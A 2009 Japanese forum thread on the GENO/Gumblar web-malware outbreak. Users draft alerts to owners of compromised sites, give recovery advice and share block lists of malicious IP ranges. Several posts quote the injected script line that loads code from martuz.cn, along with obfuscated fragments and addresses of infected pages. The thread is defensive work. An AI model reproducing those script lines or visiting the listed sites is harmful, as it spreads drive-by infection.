ftpパスワードやID、その他のSNSのパスワードなども、盗みだされている可能性が
ありますので、安全なPCから、自分の使用している(4月以降にログイン動作を
行なった可能性のある)パスワードを全て変更しておいたほうがいいかもしれません。
112192.168.0.774:2009/05/17(日) 13:18:24 ID:ilxyL7Fy0
(以下を付けるかどうかはお好みで)

■再発防止策

WindowsUpdate、Adobe Acrobat Reader、Adobe Flash Playerの積極的なアップデートに
加えて、既知の危険サイト(今回の場合は、http://www29.atwiki.jp/geno/の焼却リスト参照)を
ブロックするよう、セキュリティソフトのFWを適切に設定したり、PG2といったソフトで
ブロックすることしかないと思います。

感染してしまったことは、新型の危険ファイル配布方法の為、仕方ない面もありますが、
再発防止と、閲覧者に対する告知によって、被害の拡大を食い止めて頂きたいと思います。

■私見による蛇足

小林製薬の告知ページ等では、幾つかのセキュリティソフトベンダーを紹介して
おりますが、実際に稼動する本体は、ほとんど日替わりのように入れ替えられて
いる為に、紹介されているセキュリティソフトにて「除去が行なえるとは言い
切れません」。
http://www.kobayashi.co.jp/info/090512.html

また、感染ファイルの除去を行なっても、Windowsの一部ファイルを変更して
しまっている為、原状復帰には至りませんので、閲覧者向けに告知される場合は、
セキュリティソフトベンダーのソフトでで駆除できる可能性もありますが
PCのリカバリを推奨するのが良いのではないかと思われます。


以上、要件のみにて失礼致します。
--
○○○○(自分の名前) <自分の連絡先メールアドレス>
113192.168.0.774:2009/05/17(日) 13:19:27 ID:ilxyL7Fy0
>>109,>111-112

昨日、みかけた範囲の感染サイト管理者に送ったメールのコピペ。
テンプレの叩き台にでもどうぞ。
114192.168.0.774:2009/05/17(日) 13:19:43 ID:mJUiMCyk0
>>90
>>100
http://pc11.2ch.net/test/read.cgi/sec/1242504332/907

長くなっちったから
ぬっちしたアドレスだけ置いとく ありがとう
115192.168.0.774:2009/05/17(日) 13:19:59 ID:AvccT1I50
ID:ilxyL7Fy0さん乙です
116192.168.0.774:2009/05/17(日) 13:20:16 ID:Sggs+C2i0
>>112
最初に小林製薬が感染したと同じウィルスと入れた方がインパクトがあるように思いますが
117192.168.0.774:2009/05/17(日) 13:21:09 ID:6zykGUMd0
>>109
文才ありますねー、それで送ってください
118192.168.0.774:2009/05/17(日) 13:21:44 ID:GRfaSwDkP
>>116
製薬会社がウィルスに感染したとかとんでもないしな
119192.168.0.774:2009/05/17(日) 13:22:42 ID:T9pTie3x0
>>113
いやー管理者っつっても名前だけで外に製作任せてるかもしれんしな
まずは読ませる事を考えて、実例と顧客に被害が及ぶ事を説明して
信憑性あるサイトでも貼り付けて対応はよくわかる人に任せた方がいいんじゃない
何通もそんなの着ても速攻でゴミ箱いきな予感
120192.168.0.774:2009/05/17(日) 13:24:51 ID:2KRNOGSH0
>>107
最近、いろいろな国内企業の公式サイトが 悪意の攻撃者に改竄されているのはご存知でしょうか?
先日も小林製薬のサイトも改竄されて、サイトを閲覧した一般のお客さんにウィルスが感染しました。
じつは・・・

みたいな切り出しでよいのでは?
対策法とかは、もしかしたら、その担当者がセキュリティーベンダーに相談するような方向の方が良いかもしれない。
尋ねられたら、知っている範囲で答えてあげればいいし。

それだと、イタズラに思われるかな?
121192.168.0.774:2009/05/17(日) 13:25:33 ID:5zpzhS0v0
>>120
なんかスパムメールみたいに見えるなぁ
どうしたもんかね
122192.168.0.774:2009/05/17(日) 13:26:25 ID:7TaPV4fL0
まさか、人に文を読ませるために考えることになるとは思わなかったなw
123192.168.0.774:2009/05/17(日) 13:27:17 ID:T9pTie3x0
アフェリみたいでうさんくさいwwwごめん(´・ω・`)
ちょっとスレから離れます。適当にがんがれw
俺は>>120路線でso-net張ってやって、
誰かに相談してねって方向が良いと思う
url貼っちゃうと感染してないPCで踏んじゃうかもね
124192.168.0.774:2009/05/17(日) 13:27:52 ID:ytTR6LEA0
新たな「Webウイルス」が猛威、感染被害が急増:ITpro
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/

正規サイトに感染広がる:新手のWebベースマルウェアが急拡大 - ITmedia エンタープライズ
http://www.itmedia.co.jp/enterprise/articles/0905/15/news032.html

セキュリティ通信|セキュリティ関連ニュース バックナンバー 
正規サイト改ざん(2) 薬事日報社が調査結果公表?改ざんの手口が明らかに
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=1868

セキュリティ通信|セキュリティ関連ニュース バックナンバー 
正規サイト改ざん(3) ウイルスに感染しないための対策
http://www.so-net.ne.jp/security/news/view.cgi?type=2&mode=bkno&no=1867

もし、メールを送るのなら、これもつけておくと吉かも。
125192.168.0.774:2009/05/17(日) 13:27:59 ID:rsI8zkAT0
>>121
スパム吹いた
もうそんな風にしかみえなくなったじゃないかw
126192.168.0.774:2009/05/17(日) 13:29:09 ID:77O8s7yk0
今までの流れをみてると、各自が自分でちゃんと対策するのに任せるしかないって気がするけどな。
127192.168.0.774:2009/05/17(日) 13:29:42 ID:0CtfCDPI0
>>111
unescape()して出てくるサイトの一覧ってどこにあるの?まとめサイト?
 
成美堂出版の改竄部分をunescape()したら martuz.cn が出たけど
 <script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
 
src=// なんて表記でちゃんとアクセスできるのかな? http: の部分を抜くのは何なんだ??
128192.168.0.774:2009/05/17(日) 13:31:22 ID:fQ7GRX9bO
>>121
典型的なスパム文だわな
初めに誰もが知ってる大手の名前を出して注意をひくところが

難しいねぇ
129192.168.0.774:2009/05/17(日) 13:32:13 ID:T9pTie3x0
御社のHPを拝見した所、ウイルスを検出しました。
HPが改変されています。

これは、現在流行っているウイルスの一種で、
HPを見るだけで感染してしまい、被害を拡大する恐れがあります。
こちらのso-netのリンクに詳細が書かれているので参考にしてください。
so−netのURL
ご対応の程、宜しくお願い申し上げます。

尚、ウイルスに関して現在判明している情報は以下の通りです。
まとめのURLか、セキュベンダーのURL


↑こんなんでどうでしょ
130192.168.0.774:2009/05/17(日) 13:34:14 ID:Sggs+C2i0
正規のプロバイダメールで出せばどうなのかな?
ヘッダを見たらスパムメールじゃない事が分かるし
131192.168.0.774:2009/05/17(日) 13:35:58 ID:77O8s7yk0
名前だしただけで信頼されるような大手が複数でこの問題を扱ってるのを示せるわけじゃないからなあ。
現状で個人ができることなんてたかが知れてるし、変なやる気出してマルチポストしまくるのはかえって問題だ。
ちゃんと説明できるやつが家族や友人の面倒みるくらいで十分じゃないか。
企業の面倒まで見切れない。
132192.168.0.774:2009/05/17(日) 13:36:03 ID:CRVJI+EQ0
一般人っぽく簡潔に書くのがいいんだろうな。やっぱり
133192.168.0.774:2009/05/17(日) 13:36:15 ID:T9pTie3x0
店舗のメアドに送るならヘッダすら見ないと思うし
製作した会社とか鯖缶宛てなら詳しい事書かないでも
まとめ見りゃわかるでしょ。一般的に見たら解らないものは拒否だから。
134192.168.0.774:2009/05/17(日) 13:36:20 ID:ilxyL7Fy0
わたしの主人がオオアリクイに〜(以下略) みたいなタイトルで送るとか。(余計にスパムだなw)

ま、冗談はさておき

1.HP管理者は気付いてすらいないのが殆どなので、読んでもらう必要がある
2.放置すると、ウイルス感染の二次被害の加害者になる危険があることを説明
3.よくわからないコードであるところの危険部分がどこだか指摘
  (どの箇所に挿入されるか書いておくだけでいいかも?)
4.対処方法の説明。
  まずはPCリカバリかOS再インストール→ftpパスワードを変更する→Webサーバーの中身を空にする
  →感染していないファイルを再UP の順番で行なうように説明
5.参考情報として、該当ウイルスの情報や対策についてのまとめリンクをつけておく
  (これを前に持ってくるか後に持ってくるかはどっちがいいんだろう?)
6.おまけとして念のために予防策の説明(は、押し付けがましいのでなくてもいいかも)
135192.168.0.774:2009/05/17(日) 13:36:50 ID:uL9xj+2n0
>>129
非常勤の親父「また迷惑メールか削除削除・・・」
136192.168.0.774:2009/05/17(日) 13:36:57 ID:K2sBx0VP0
上で誰かが書いてたか、お客さんを装った平易な文章のほうがいい気がする


「お宅のホームページ見てたらアンチウイルスソフトが警告を出したので、調べてみたら
ウイルスコードがしかけられているようでした。
(so-netURL)と同じものと思われます。
ホームページを見るだけで、お客のパソコンが感染する危険なウイルスです。
どうか今すぐ対策をとってください
(対策サイトURL)」

とかなんとか
137192.168.0.774:2009/05/17(日) 13:37:27 ID:Um/4qeYR0
【速報】虹裏感染の疑い
138192.168.0.774:2009/05/17(日) 13:37:57 ID:T9pTie3x0
>>135
あるなwww
ここまで簡単に書いてもそれなら
もうそれはしょうがないよ
GENOの担当者は結局無反応だったよね?
139192.168.0.774:2009/05/17(日) 13:38:09 ID:mJUiMCyk0
複数名から違う文章で送れば 対応してくれんかなあ
140192.168.0.774:2009/05/17(日) 13:39:11 ID:ilxyL7Fy0
7.閲覧者への事後報告と、感染の可能性の疑われる場合は、使用中のセキュリティソフトベンダーに
  相談するように告知して欲しい、隠蔽されてしまうと、被害が拡大し、最終的にはその企業の信用が
  落ちてしまう。…ということも伝えたいがどうしたもんか。
141192.168.0.774:2009/05/17(日) 13:39:34 ID:77O8s7yk0
メールちゃんと読んでくれるような管理者ならすでに問題を知っていて対策してるだろ。
2chのまとめだってどこまで信頼してもらえるか微妙だし、こちらの所属を明らかにして送るんでもなければスパム扱いで終わりだ。
142192.168.0.774:2009/05/17(日) 13:39:58 ID:T9pTie3x0
>>139
なんだ急に変なメール増えたな・・・削除削除(´・ω・)

レン鯖に連絡した方がいいんじゃね?

まぁ一軒潰した所で(ry
143192.168.0.774:2009/05/17(日) 13:41:26 ID:ilxyL7Fy0
HP管理者ではなく、そのIPを管理している業者(whoisで調べる)のabuse窓口に送って、
ISPもしくは、レンタルサーバー管理会社を経由して警告して貰うという手法もあるね。
144192.168.0.774:2009/05/17(日) 13:43:33 ID:um/XFnMU0
もうこれぐらい挑発的なので良いんじゃないか?
これ送って反応無ければ、たまたま見つけた人っぽく上のメール送ってやる感じで

貴社のホームページがGENOウィルスに感染し、現在加害者になっています。
数日中に貴社ホームページよりウィルスコードの除去がなされていない場合、
京都府警察ハイテク犯罪対策室へ連絡させていただきます。


p.s. 対策に関してはググレ
   管理できないホームページなら閉鎖しろ糞管理人
145192.168.0.774:2009/05/17(日) 13:44:37 ID:T9pTie3x0
てめーこのやろー
ページ開いたらパソコンばっ壊れたじゃねーか
さっさとHP直しやがれ誠意ってなんですかねぃおおぅ?!
146192.168.0.774:2009/05/17(日) 13:48:45 ID:mJUiMCyk0
replica08■web■fc2■com/index■html

感染
147192.168.0.774:2009/05/17(日) 13:49:06 ID:+iVGXmeP0
・Adobe Flash Playerを更新
バージョンの確認 最新:10.0.22.87
ttp://www.adobe.com/jp/software/flash/about/
ダウンロード
ttp://get.adobe.com/jp/flashplayer/

・(入れてる人は)Adobe Readerを9.1.1に更新し、Javascriptの実行を制限する
ダウンロード 9.1
ttp://get.adobe.com/jp/reader/
ダウンロード後、[ヘルプ]→[アップデートの有無をチェック]することで9.1.1にし、

[編集]→[環境設定]→<JavaScript>→<Acrobat JavaScriptを使用>のチェックを外し、[OK]

(´・ω・`)らんらん♪
148192.168.0.774:2009/05/17(日) 13:49:47 ID:T9pTie3x0
感染ってどうやって見つけてるの?
149192.168.0.774:2009/05/17(日) 13:51:26 ID:yMbOeyMJ0
>>147
(´・ω・`)らん豚帰れよ
150192.168.0.774:2009/05/17(日) 13:54:23 ID:RrqXiVyA0
avastとバスター2009の同居ってやっぱだめ?
151192.168.0.774:2009/05/17(日) 13:55:57 ID:iagHZf1s0
すまん、流れ読まずに投下
gnome氏のzlkon/gumblarサイトを参考に作ったんで防止策の一つとして貼っておく
・サーバがちょくちょく変わる性質なので今後の動向に注意
・一番上のmartuz.cnはNEW
・行頭の"HiPr-"はgnome氏が緊急(High Priority)と書いてるもの
・言うまでもないが、IP範囲最終決定とか使用は自己責任で

HiPr-NEW martuz.cn - 2009.05.16 (95.129.144.0/23) :95.129.144.0-95.129.145.255
HiPr- Botnet C&C by Gumblar - 2009.05.09 (78.109.16.0/20) :78.109.16.0-78.109.31.255
HiPr- gumblar relative 2009.05.07 (213.182.192.0/19) :213.182.192.0-213.182.223.255
HiPr- gumblar - 2009.05.02 (94.229.64.0/20) :94.229.64.0-94.229.79.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (206.44.0.0/16) :206.44.0.0-206.44.255.255
Malware Injection 2009.05.06 (91.211.64.0/23) :91.211.64.0-91.211.65.255
basesrv3.net - 2009.05.03 (91.212.41.0/24) :91.212.41.0-91.212.41.255
Malware Injection 2009.05.06 (91.212.65.0/24) :91.212.65.0-91.212.65.255
Trojan Exploits (Regarding ZeuS) -- 2009.05.14 (85.17.0.0/16) :85.17.0.0-85.17.255.255
autobestwestern.cn - 2009.05.13 (85.214.90.0/24) :85.214.90.0-85.214.90.255
gumblar via e-mail - 2009.05.12 (74.220.215.0/24) :74.220.215.0-74.220.215.255
zlkon another-type 2009.05.03 (212.117.160.0/19) :212.117.160.0-212.117.191.255
zlkon.lv -- 2009.04.05 (94.247.2.0/23) :94.247.2.0-94.247.3.255
152192.168.0.774:2009/05/17(日) 13:57:46 ID:77O8s7yk0
一般に、機能の衝突するセキュリティソフトを複数導入するのは推奨されない。
153192.168.0.774:2009/05/17(日) 13:58:36 ID:RrqXiVyA0
>>152
だよね
バスター常時待機でときたまavastで検索って感じがいいかな?
154192.168.0.774:2009/05/17(日) 14:00:18 ID:0CtfCDPI0
成美堂出版 → martuz.cn
<script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>

replica08■web■fc2■com → martuz.cn
<script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>

意外と飛び先は少ないのかもしれん リストが無いならつくるかねぇ
155192.168.0.774:2009/05/17(日) 14:00:38 ID:2KRNOGSH0
俺スパマーになれんのか?あっはは。

>>146のIP 208.71.106.38


>>147
Adobe Readerってバージョン違いで共存できたっけ?
テンプレ的には Ver1〜Ver8とか使っている人は削除して ってのを途中に入れたほうがいいかもしれない。


しかし、IPA↓ 110番を語るには休みすぎ。

コンピュータウイルスの相談窓口としてコンピュータウイルス110番の電話を設けております。
届出の方法等、コンピュータウイルスに関連のあることは何でもご相談下さい。  
受付時間:平日10:00〜12:00、13:30〜17:00

>>151
参考にさせてもらいます。
156192.168.0.774:2009/05/17(日) 14:04:21 ID:1tk6kEt+0
>>93
Avast!をすり抜けるサイト教えてくださいませ。見つけられない。
157192.168.0.774:2009/05/17(日) 14:05:24 ID:LQE1Ao+t0
「5.危険IPのブロック」の方法がわからないのですが、教えてくれませんか?
158192.168.0.774:2009/05/17(日) 14:08:44 ID:1tk6kEt+0
>>157
セキュリティソフトでブロックする方法とルータでブロックする方法がある。
とりあえずルータの有無と使用しているセキュリティソフトを書いて。
159192.168.0.774:2009/05/17(日) 14:09:06 ID:TTgW4pHv0
>>64
GENOウィルスチェッカーだとひっかがらんよ
チェッカーは、まだだめみたいね
160192.168.0.774:2009/05/17(日) 14:09:07 ID:77O8s7yk0
>>157
他の対策は済んだのか? 先にそっちをやっていれば5.に関してはそれほど神経質にならなくていい。
これからもソフトのアップデート情報には注意してください。
161192.168.0.774:2009/05/17(日) 14:10:30 ID:T9pTie3x0
これも一応置いとく
前スレか何処かに落ちてた
http://www.dotup.org/uploda/www.dotup.org36588.txt.html
パスはGENO
162192.168.0.774:2009/05/17(日) 14:13:51 ID:LQE1Ao+t0
>>158 ルーターは NEC Aterm WR8500N セキュリティソフトはavast!です。
>>160 他のはすべて終わっています。一応念のためにも、と
163192.168.0.774:2009/05/17(日) 14:18:21 ID:G0FsAaa+0
御社のHPがウィルスに感染し、改竄されております。
改竄により御社ホームページを閲覧した一般のお客様まで次々と感染してしまう状態となっており、
現在御社が意図せぬ加害者となってしまっております。

被害を拡大を最小限に抑えるためにも、早急なご対応をお願い致します。


以下このウィルスについての説明を添えさせていただきます。

---

こんな感じで以下>>109路線の文章を貼り付けるのはどうだろう

読んで理解できる人がメールを受け取れば読むだろうが、理解できない人が見たときでも緊急性が伝わるように簡潔な前置きをおくべきかと
だが>>120路線だとセキュリティソフトの売りつけやサービスの営業スパムに見える気がする

・HPが改竄されている
・意図せぬ加害者となっている
・早急な対応を!

ということだけは伝える必要があるよな
これだきちんと伝われば理解できる人にパスされるだろうし、理解できる人がメールを受け取ったら自分でちゃんと読むだろう。
164192.168.0.774:2009/05/17(日) 14:20:24 ID:77O8s7yk0
どうせ休日明けまで対処はないし、出社したら状況は把握するだろ。
165blocktxt:2009/05/17(日) 14:24:07 ID:6zykGUMd0
一行だけですけど95.129.144.0-95.129.145.255
追加しておきました。教えて君が増えるのでパス付けました。
パスは zlkonの2009/04/27(月)時点の○○○○○個数
住人ならわかるはず、CIDRはありません・・・変換マンドクセ

ttp://www.rupan.net/uploader/download/1242537519.txt


166192.168.0.774:2009/05/17(日) 14:24:30 ID:ilxyL7Fy0
>>156
TOPページは引っ掛かったが、リンクされている他のページの幾つかがVirusTotalではスルーになってました。

実際にAvastでアクセスしたのではなく、ダウンローダで感染サイトのTOPページのhtmlを取得。
エディタで開いてリンク先を片っ端からダウンローダで取得。拾ったうちの幾つかは、Avastスルー。
(8〜9割は検知してましたが、昨日拾った検体の中での話)

Avastに提出済みなので、近いうちには対応されるかと思いますが、難読化されたスクリプトには
複数のバリエーションがあるので、今後もすり抜けるケースも存在すると思いますから、
○○(今回はAvast)入れておけば大丈夫といった表現は避けた方がいいと思います。
167192.168.0.774:2009/05/17(日) 14:26:27 ID:2KRNOGSH0
>>163
それでいいと思う。
これまでにも
「サイトを閲覧していたユーザーからの連絡があったため調査し見ると〜に感染していると判明した」ってのは多い。
十分に内容は伝わっていると思うから、早速出した方が良いと思う。
168192.168.0.774:2009/05/17(日) 14:29:35 ID:2KRNOGSH0
あっちのスレが終わりそうだが、こっちに来る気か?
169192.168.0.774:2009/05/17(日) 14:30:17 ID:1tk6kEt+0
>>162
Avast!にはファイヤーウォール機能がないから、ファイヤーウォールアプリを
入れてブロックするIPを設定するか、ルータのIPフィルタリング機能を使う。
ルータの場合、
http://www.aterm.jp/function/guide4/high/saver/wd/9s_m7bb.html#ip0
を参考に。
170192.168.0.774:2009/05/17(日) 14:30:29 ID:VGi2lcCh0
>>166
いくつか晒されたスクリプトを見る限りだとUA偽装も多少は有効そうなんだが、
実際のところはどうなんだろう。
まぁ条件式変えられる可能性が高いから安全とは全然言いがたいが。
171本スレ誘導:2009/05/17(日) 14:33:19 ID:789Se66x0
>1
乱立すんな死ね!!!!!!!!!!!!!!!!!!!



本スレはこっちな

GENOウイルススレ ★11
http://pc11.2ch.net/test/read.cgi/sec/1242538005/

172192.168.0.774:2009/05/17(日) 14:34:02 ID:VCQZY8+a0
お前ら落ち着け!今は争ってる場合じゃない!
173192.168.0.774:2009/05/17(日) 14:34:27 ID:ov4CW62y0
174192.168.0.774:2009/05/17(日) 14:34:39 ID:Sggs+C2i0 BE:508226292-S★(636363)
>>239
avastはファイアウォールがついてないのでそちらの方の対策は大丈夫ですか?
もし、対策されていたら余計なお世話ですみません。
175192.168.0.774:2009/05/17(日) 14:35:26 ID:Sggs+C2i0 BE:451757344-S★(636363)
>>174
すみません失礼しました。誤爆しました。
176192.168.0.774:2009/05/17(日) 14:35:36 ID:ilxyL7Fy0
Avast常駐中に「JS:Redirector-H 〜 JS:Redirector-H9」か、類似の名称で検知した場合は
zlkon.lv/gumlar.cn/martuz.cn からマルウェアを落とそうとするページである可能性が高い…程度の表現かなぁ。

JS:Redirector-H(無印),JS:Redirector-H2,JS:Redirector-H4,JS:Redirector-H7,JS:Redirector-H9は
手元の検体で確認済み。
177192.168.0.774:2009/05/17(日) 14:35:36 ID:Ts61gYp70

お前意地張ってないで
本スレ見た方がいいぞ
今あっちでは双葉ちゃんねるが感染したって騒ぎになってるから
178192.168.0.774:2009/05/17(日) 14:35:40 ID:LQE1Ao+t0
>>169 おおどうもです。そんなサイト探してました。とりあえずルーター設定でやってみます。
179192.168.0.774:2009/05/17(日) 14:36:01 ID:1l1Ze1DVP
どこが本スレだよ
教えやがれ奴隷ども
180192.168.0.774:2009/05/17(日) 14:36:07 ID:1tk6kEt+0
>>166
なるほど。了解。
そこまでやってなかったわ。
181192.168.0.774:2009/05/17(日) 14:36:34 ID:ov4CW62y0
>>173
ごめん、1行目コピペ忘れてたは
182192.168.0.774:2009/05/17(日) 14:37:31 ID:zd6xXlce0
183192.168.0.774:2009/05/17(日) 14:37:46 ID:VCQZY8+a0
取り敢えずうちのPCは感染していない事が判ったので
俺はバスターの対応を待つ
それまでPCではここと2ちゃんしかみない
ミクシィも携帯のみにするわ
184192.168.0.774:2009/05/17(日) 14:41:08 ID:LQE1Ao+t0
[セキュリティ版]GENOウイルススレ ★10でID表示される掲示板が良いと言う事になって、
こっちにスレが立つことになりました。★11は立てないはずだった様ですけど。
185192.168.0.774:2009/05/17(日) 14:41:19 ID:YGxJUpFP0
すみません少しテンパってます、知恵を貸してください
スレチなら誘導して頂けると幸いです

普段ブラウザはもっぱら火狐だがこの機会にIEも最新のにしておくかと8を用意

インスコ失敗しましたので再起動推奨しますよ!にホイホイ釣られてうっかり再起動

何故か青くはならなかったけどデスクトップ壁紙のみ/(^o^)\

辛うじて記憶していたショートカットでタスクマネージャ起動

新しいタスクの実行から専ブラ起動←今ココ

テンプレの症状で確認できていたのは以下のみ
@cmd.exe、regedit.exeが起動しない
Asqlsodbc.chmのファイルサイズがおかしい

CPU使用率は常と変わらず、使っているのはWinXPSP3 2GBです
リカバリするにも何処から仕掛けて良いのやらorz
186192.168.0.774:2009/05/17(日) 14:41:40 ID:ilxyL7Fy0
>>156
あったあった。

昨日検体提出時点(0/40)
ttp://www.virustotal.com/analisis/b778a4887a5d5c84ef2fedf2b33d9880

今、再確認したけど、やっぱりスルー(0/40)
ttp://www.virustotal.com/analisis/5935f35c8d6e05beea7789d312329ff1


アドレスはこれかな
sound■jp/yudai_marimba/

他にも2つ位、Avastスルーだけどしっかりスクリプトが挿入されているページがありました。
1つ出てきたから、あとはもういいか。

昨日の時点で入っていたもの。
|<script language=javascript><!--
|(function(ljk8K){var q0UFt='%';var ikN7=('va_72_20a_3d_<以下略>
| --></script>
187192.168.0.774:2009/05/17(日) 14:42:16 ID:VPbnNWIB0
>>185
感染確定
188192.168.0.774:2009/05/17(日) 14:44:04 ID:weq4pQS+0
スレを見てたらブラウザがウイルスに感染した、みたいなの出てきたがこれは違うやつか
189192.168.0.774:2009/05/17(日) 14:44:33 ID:um/XFnMU0
>>185
ご愁傷様でした。
とっととクリーンインスコしてください
190192.168.0.774:2009/05/17(日) 14:46:16 ID:q8u6cZFi0
>>185
どっから感染したんだろう…
余裕でアウトだな
191192.168.0.774:2009/05/17(日) 14:47:07 ID:MpyKmePW0
>>188
関係ない
つ「ノートントラップ」
192192.168.0.774:2009/05/17(日) 14:47:55 ID:weq4pQS+0
あんまり興味なかったからノートンでもavastでもなくてAVGなんだが
193192.168.0.774:2009/05/17(日) 14:48:20 ID:NFeyfEj00
Adobe ReaderとFlash Playerを最新のにしたんですが
Javascriptとかはよく分からないので放置してます。
とりあえず最新版使ってればセキュリティーホール突かれることもなく
安全なんですよね?
194192.168.0.774:2009/05/17(日) 14:49:33 ID:um/XFnMU0
今はね
195192.168.0.774:2009/05/17(日) 14:49:42 ID:1tk6kEt+0
>>186
おお、さんきゅ。
早速踏んでみたが、確かにAvast!無反応だな。
どういうロジックでAvast!は判定してるんだろ?
unescapeを解読してるわけじゃないってことか。
196192.168.0.774:2009/05/17(日) 14:50:55 ID:YpVuMiqJ0
avastからAviraAntivirに乗り換えた途端にavastが本気出してきて乗り換えたくなってきたぜ
197192.168.0.774:2009/05/17(日) 14:51:32 ID:77O8s7yk0
>>193
まあそれでOK。他のソフトも含めて、今後もアップデート情報はチェックしとこう。
198192.168.0.774:2009/05/17(日) 14:53:04 ID:Um/4qeYR0
このサイト見たらアヴァストが反応するんだけどどうなの?
反応したってことは大丈夫なんだろうけど・・・
一応閲覧注意な
HTTP;//pmpk.dojin.com/
199192.168.0.774:2009/05/17(日) 14:53:06 ID:z5ZKMxe60
hxxp://www.ukokkei.co.jp/company/index.html
だが、
会社概要の
株式会社烏骨鶏
〒920-0024 石川県金沢市西念4丁目21番18号
TEL 076-232-4255
FAX 076-233-0405
Mail [email protected]

じゃだめなん?
200192.168.0.774:2009/05/17(日) 14:53:27 ID:7Fj5Ju7c0
>>186
F-Secureユーザですが、F-Secureへ検体提供したほうがいいですか?
201192.168.0.774:2009/05/17(日) 14:54:44 ID:7TaPV4fL0
急に流れが速くなったな
202192.168.0.774:2009/05/17(日) 14:54:47 ID:buHp3trp0
セキュリティソフトの会社って自作自演とかしてるの?
自分でウイルス作ってばらまいて他社より早く定義更新してユーザーに賞賛されるとかさ
203192.168.0.774:2009/05/17(日) 14:55:02 ID:OUF99NvG0
Adobe Reader9.1.1公開日が5/13
今回GENOウイルスがターゲットにした脆弱性は
このバージョンから対策OKなのか3/11の9.1.0で対策OKだったのかどっちかな?
204192.168.0.774:2009/05/17(日) 14:55:15 ID:YGxJUpFP0
>>185です
本気でデスクトップが壁紙だけで寂しいです
アイコンもバーも無い・・・

CDとか用意した記憶がないのですがそれでもリカバリは可能でしょうか?
グーグル先生に聞いても「まずCDを作成します」から始まる絶望感
205192.168.0.774:2009/05/17(日) 14:55:24 ID:t97Zp0ei0
>>202
お前頭いいな
206192.168.0.774:2009/05/17(日) 14:57:32 ID:VPbnNWIB0
>>204
機種名ぐらいかけ
207192.168.0.774:2009/05/17(日) 14:58:26 ID:ov4CW62y0
>>203
Flash Playerは10.0.22.87と9.0.159.0が脆弱性を修正したver
Adobe Readerは7.1.1と8.1.4と9.1.0が脆弱性を修正したver

以降は別物の脆弱性ver
208192.168.0.774:2009/05/17(日) 14:58:50 ID:MpyKmePW0
>>204
タスクマネージャいけるなら
新しいタスクの実行→explorer
でタスクバーとか出るんじゃね
209192.168.0.774:2009/05/17(日) 14:59:32 ID:ilxyL7Fy0
>>200
提出済みです。
210192.168.0.774:2009/05/17(日) 14:59:44 ID:YpVuMiqJ0
>>202
それは結構前から言われてる事、本当かどうかは知らん
211192.168.0.774:2009/05/17(日) 15:00:06 ID:6zykGUMd0
>>198
gumblar.cn の現在のステータス
疑わしいサイトとして認識されています。
このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。

12799 個のドメインを感染させています。

(function(){var IlkQ='%';var xTy7='var>20a>3d>22Sc>72iptE>
6egine>22>2cb>3d>22V>65rsion()+>22>2cj>3d・・・・・・
212192.168.0.774:2009/05/17(日) 15:01:05 ID:ybsV4IQS0
ファイアフォックス使ってんだけど
弾いてくれたから大丈夫って感じなの?
213192.168.0.774:2009/05/17(日) 15:01:34 ID:Z6bHwWLb0
>>193と同じく、Adobe ReaderとFlash Playerを最新にして
Adobe ReaderのJavascriptは切っておいた。

あと今プニル使ってるので
念のためプニルの設定とIEのインターネットオプションの両方で
Javascript無効にしてる。

ただ、IEのJavascriptは実際のところどうなんだろう。
2ch専ブラにまで影響出るので、正直言うと情報収集に少々厄介なんだが。
214192.168.0.774:2009/05/17(日) 15:01:45 ID:7TaPV4fL0
そういや、3週間前にFirefoxやJane Styleのログが
PCシャットダウン→起動後に全飛びしたけど、
このウイルスとは関係ないよね。
215192.168.0.774:2009/05/17(日) 15:02:35 ID:QQBuyEr/0
ブラウザのJavascriptを切るってどうやればいいの?
216192.168.0.774:2009/05/17(日) 15:02:39 ID:DKlwM8ZhP
>>207
以前じゃなくて以降なのか?
217192.168.0.774:2009/05/17(日) 15:02:47 ID:7TaPV4fL0
テンプレに書かれている症状は一切ないし、大丈夫だと思いたい。
218192.168.0.774:2009/05/17(日) 15:03:21 ID:ov4CW62y0
>>216
ごめん、以降は別の脆弱性修正ver
219192.168.0.774:2009/05/17(日) 15:04:09 ID:ilxyL7Fy0
検出可否スレより最新情報を転記

最新の落とされてくる本体ファイルの検出結果。こんな状況なので、セキュリティベンダーの対応を待って
除去してもらおうとか考えるよりも、感染が疑われる(HPを更新したPCとか、踏んじゃった人とか)は
PCリカバリ(OS再インストール)以外の解決策は推奨できないようです。

martuz_cn_id2_20090517.pdf
 MD5 :3cdbaee0c533809e43c6b815884763ff
 http://www.virustotal.com/jp/analisis/d0f152cbbb8243f084d05485a3d7c3a6 (2/40)
martuz_cn_id10_20090517.exe
 MD5 :b0ca69853b371ec9eb58829e869f6f10
 http://www.virustotal.com/jp/analisis/7e25c8d2c3766206c20482234449894d (3/40)
220192.168.0.774:2009/05/17(日) 15:06:25 ID:2kKhzap+0
>>218
もちつけ
221192.168.0.774:2009/05/17(日) 15:06:50 ID:HpOylDYR0
USBメモリでも感染る?
222192.168.0.774:2009/05/17(日) 15:07:36 ID:OUF99NvG0
>>207
サンクス
ということは3月のアップデートをきっちりしておけば
こいつに関してはとりあえずOKということだね
223192.168.0.774:2009/05/17(日) 15:07:41 ID:DKlwM8ZhP
>>218
そういう意味か
脆弱性復活したのかと思ったw
224212:2009/05/17(日) 15:07:54 ID:ybsV4IQS0
ちょwww誰か教えてくださいwww
このままじゃトイレにもいけねぇ
225192.168.0.774:2009/05/17(日) 15:09:26 ID:+t63J1Bn0
本スレ見てきたんだが、なんかもうGENO付きURL配布とかしてるし
感染は拡大する一方だな


俺なりにまとめてみた
http://geocities.com/gerardopearson50/kristy-shelton.html


追加あったら気軽に書いてくれ
226192.168.0.774:2009/05/17(日) 15:10:34 ID:7yrlZLjk0
>>224
かけちゃえかけちゃえ
227192.168.0.774:2009/05/17(日) 15:10:37 ID:yV8RyIy+0
>>185
ubuntsかなにかのLive CDは用意できないのか?
感染状態でexplorer起動しても、右クリックのコンテキストメニューが
使えないはずだからPC単体ではもはや復帰できないと思う。

あるいはもう一台HDDがあれば、感染したHDDを抜いて、別HDDに
OSをインストールすれば復旧の方法はある
228192.168.0.774:2009/05/17(日) 15:10:57 ID:xLw+W3X80
>>219
